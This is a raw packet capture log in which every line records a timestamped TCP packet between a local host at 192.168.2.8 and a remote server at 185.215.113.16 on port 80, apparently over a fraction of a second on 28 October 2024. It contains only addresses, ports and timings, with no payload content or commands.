                                                                                                    Oct 28, 2024 07:18:47.637947083 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.637955904 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.637967110 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.637976885 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.637976885 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.637984991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638000965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638012886 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638024092 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638032913 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638034105 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638045073 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638051033 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638056040 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638065100 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638066053 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638077021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638096094 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638104916 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638115883 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638115883 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638118029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638178110 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638178110 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638187885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638199091 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638211012 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638221979 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638242006 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638258934 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638272047 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638283968 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638334036 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638350964 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638394117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638465881 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638475895 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638488054 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638505936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638516903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638529062 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638528109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638540030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.638753891 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638753891 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.638753891 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.679692030 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.679711103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.679723024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.679735899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.680320024 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.680320024 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.680824041 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.680835962 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.680846930 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.680857897 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.681021929 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.697221041 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.720918894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.720937014 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.720948935 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.720963001 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721157074 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721157074 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721214056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721225977 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721235991 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721246958 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721281052 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721281052 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721319914 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721364975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721381903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721393108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721405029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721419096 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721431017 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721437931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721437931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721447945 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721460104 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721488953 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721488953 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721539974 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721549988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721559048 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721573114 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.721592903 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.721606016 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734447002 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734515905 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734529018 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734539986 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734553099 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734565973 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734577894 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734591007 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734648943 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734661102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734672070 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734684944 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734695911 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734709024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734755039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734803915 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734817028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734827995 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734842062 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734853029 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.734855890 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734869957 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734966993 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734978914 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.734991074 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735016108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735028028 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735039949 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735055923 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735066891 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735080004 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735102892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735102892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735102892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735102892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735104084 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735104084 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735140085 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735151052 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735161066 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735162020 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735176086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735194921 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735205889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.735271931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735271931 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.735272884 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.754741907 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754760027 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754772902 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754857063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754868031 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754872084 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.754885912 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754898071 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754909039 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.754916906 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.754936934 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.754960060 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756510973 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756545067 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756561995 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756575108 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756587029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756639957 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756695986 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756709099 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756721020 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756783009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756783009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756783009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756783009 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756807089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756817102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756819010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756825924 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756835938 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756841898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756872892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756872892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.756936073 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756947994 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756961107 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756972075 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.756999969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757010937 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757021904 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757034063 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757042885 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757055044 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757066011 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757066011 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757066965 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757066011 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757107019 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757153988 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757169962 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757180929 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757189989 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757191896 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757203102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757221937 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757222891 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757236004 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757249117 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757280111 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757280111 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757291079 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757302046 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757302999 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757313967 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757323980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757334948 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757363081 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757363081 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757369995 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757380009 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757390976 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757405996 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757421970 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757433891 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757445097 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757446051 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757467031 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757481098 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757494926 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757507086 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757519960 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757545948 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757548094 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757637024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757683992 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757697105 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757735014 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757747889 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.757862091 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757862091 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.757862091 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.798742056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.798764944 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.798777103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.798846006 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.798846006 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.799912930 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.799930096 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.799942017 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.800131083 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840009928 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840027094 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840156078 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840178013 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840188026 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840271950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840274096 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840281963 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840318918 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840354919 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840364933 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840399027 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840434074 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840491056 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840492010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840503931 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840513945 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840537071 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840550900 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840605021 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840636969 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840647936 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840658903 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840678930 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840691090 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840702057 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840713024 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840713024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840727091 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.840733051 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840759039 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.840775967 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.844706059 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853425980 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853441000 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853458881 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853470087 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853482008 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853492975 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853521109 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853542089 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853554010 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853555918 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853564024 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853576899 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853621960 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853668928 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853708029 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853719950 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853729963 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853740931 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853751898 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853763103 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853782892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853782892 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853794098 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853813887 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853825092 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853838921 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853852034 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853862047 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853878021 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853889942 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853897095 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853897095 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853902102 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853913069 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853929043 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853934050 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853939056 CET8049717185.215.113.16192.168.2.8
                                                                                                    Oct 28, 2024 07:18:47.853974104 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853974104 CET4971780192.168.2.8185.215.113.16
                                                                                                    Oct 28, 2024 07:18:47.853977919 CET8049717185.215.113.16192.168.2.8
